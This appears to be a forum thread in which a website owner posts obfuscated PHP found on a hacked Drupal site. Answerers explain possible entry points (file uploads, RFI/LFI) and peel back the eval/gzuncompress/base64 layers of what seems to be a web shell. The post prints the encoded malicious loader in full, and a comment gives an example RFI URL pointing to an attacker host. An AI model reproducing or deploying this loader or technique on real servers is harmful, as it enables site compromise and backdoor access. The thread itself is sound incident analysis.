92BTiVXZUrl/IJ0ju74S0CD30D38uWCLqObS/kqFHDqXu4bxwLOUx83Mkusm157v2lHqu3XvGGsXi883eAFVs0ER8H1082OqoYHtsdUsO2Zil/Y5i+EsYRNQyuzmKKx04GOR3/aMTECFjB/4ARjj3RMKhOdbzYPPD5jxfiXsojRgwoe3/0r2DCJNeVPDYqXGzEKqB1bttdvIQy93zkO05jGbb7A+rpNlDtIKOaQbg+wHcYI8Vd0SS6Kn3tg9SVBmiKj0FvBdaLBYcBizNUza8er8QrT2IRIZE3lqwjk4Xy5ky9S7Kat4TK7617O6NuqsaOYstE2X/OkK++MQ5TlmvlDn6j2CFz1z1mrAu9SjpCQHADSn/yFhcqLgMg6phJrgmwLXcm+uO3xkq1rr85ft6NiEab/6bB/8jYL2H+DPXm85A85BO7u+S1Z3me5mr/968/vr29/7n6ZPr98/73237Pvxc/Z97/+5fk//7L8r7/963//D4qbheo='))); ?><?php eval(gzuncompress(base64_decode('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'))); ?>
```

Comment: This question appears to be off-topic because it is not within the bounds of discussion as described in the help center.

Comment: Would this question be better on superuser.com?

Answer (score 2, accepted):

First of all, you need to know two things:

1. This may not be your fault. If its a shared host, the hacker may have compromised any of the other thousand websites on the host, rooted the server, and then attacked your site from within.
2. Having said that, it may be your fault, so don't relax. Still look for holes.

But, besides looking at the logs, look for vulnerabilities within the sites. Does the site accept user-submitted content? If so, are there file uploads. If so, do you check the file for MIME-Type or just extension.

Another thing is RFI and LFI hacks. These vulnerabilities allow hackers to inject shells into your site, effectively making them administrators with complete file access. Look for these vulnerabilities.

If you can post the code in the `.txt` files, I'd be happy to "decipher" it for you.

If I can think of anything else, I'll addon.

*Edit 1*

So, essentially the hacker used `base64` and `gzcompress` to "obfuscate" the code. He then executes the uncompressed code with the `eval()` function. So, essentially, you can see the first layer of code by removing the `eval()` function and running the code. Unfortunately, under the first layer, there's another layer which I'm looking at.

In addition, since you say Drupal.... you may be using addons or plugins. Drupal may be secure, but those addons or plugins may not be. Do any of them handle form uploads or files in any way?

*Edit 2*

1. [First Layer](http://chopapp.com/#y7qkiwtm) (Submitted by OP).
2. [Second Layer](http://chopapp.com/#737x7b73) (Initial `gzuncompress` and `base64_decode()`).

Still working on it...

Comment: Thanks! Most of the sites accept user submitted content, most of them handle it through Drupal, and I believe Drupal does check the MIME type but I'm not sure. As for RFI and LFI hacks, I'll have to look that up and then get back to you. I've added the source code in my post.

Comment: @MikeHeremans RFI and LFI are primarily the URLs of a website. For example, if a page is accessed through `site.com/index.php?u=about.html`, then an attacker would assume that `index.php` reads and prints out `about.html`. He could then feed it a malicious URL like `site.com/index.php?u=http://hacker.net/malicious.php` in the hope that your site would read and execute his code. If it did, then at that point, he could inject a shell like the `C99 Sheel`.

Comment: @MikeHeremans look at *Edit 2*.

Comment: I was able to get there too, by running the script piece by piece in my test environment. Couldn't get further though. I concluded it was a shell script by looking at the different functions listed. Thanks for the effort :) (And the explanation on RFI and LFI)

Comment: There are modules that handle uploads but most of them are drupal core. The RFI and LFI attacks are blocked by drupal I would imagine, since the entire site works with this type of system.

Comment: @MikeHeremans I actually got a little further but I haven't had time to post my results yet. Will do soon. And no problem about the rest of the stuff. But for future reference, understand that just because a plugin is a "Drupal plugin" does not mean it is secure. And sometimes, Drupal itself is not secure. For example, look at [this](http://shreyashcyberworld.blogspot.com/2012/07/remote-file-upload-vulnerability-method.html) and [this](http://shreyashcyberworld.blogspot.com/2012/07/remote-file-upload-vulnerability-method.html).

Comment: Oh, I do understand. That might have very well been the way they got in. Thanks again for all the effort :)

Comment: @MikeHeremans you're most welcome. If you did find my answer helpful, then please "Accept It" by clicking the checkmark on the top left of it.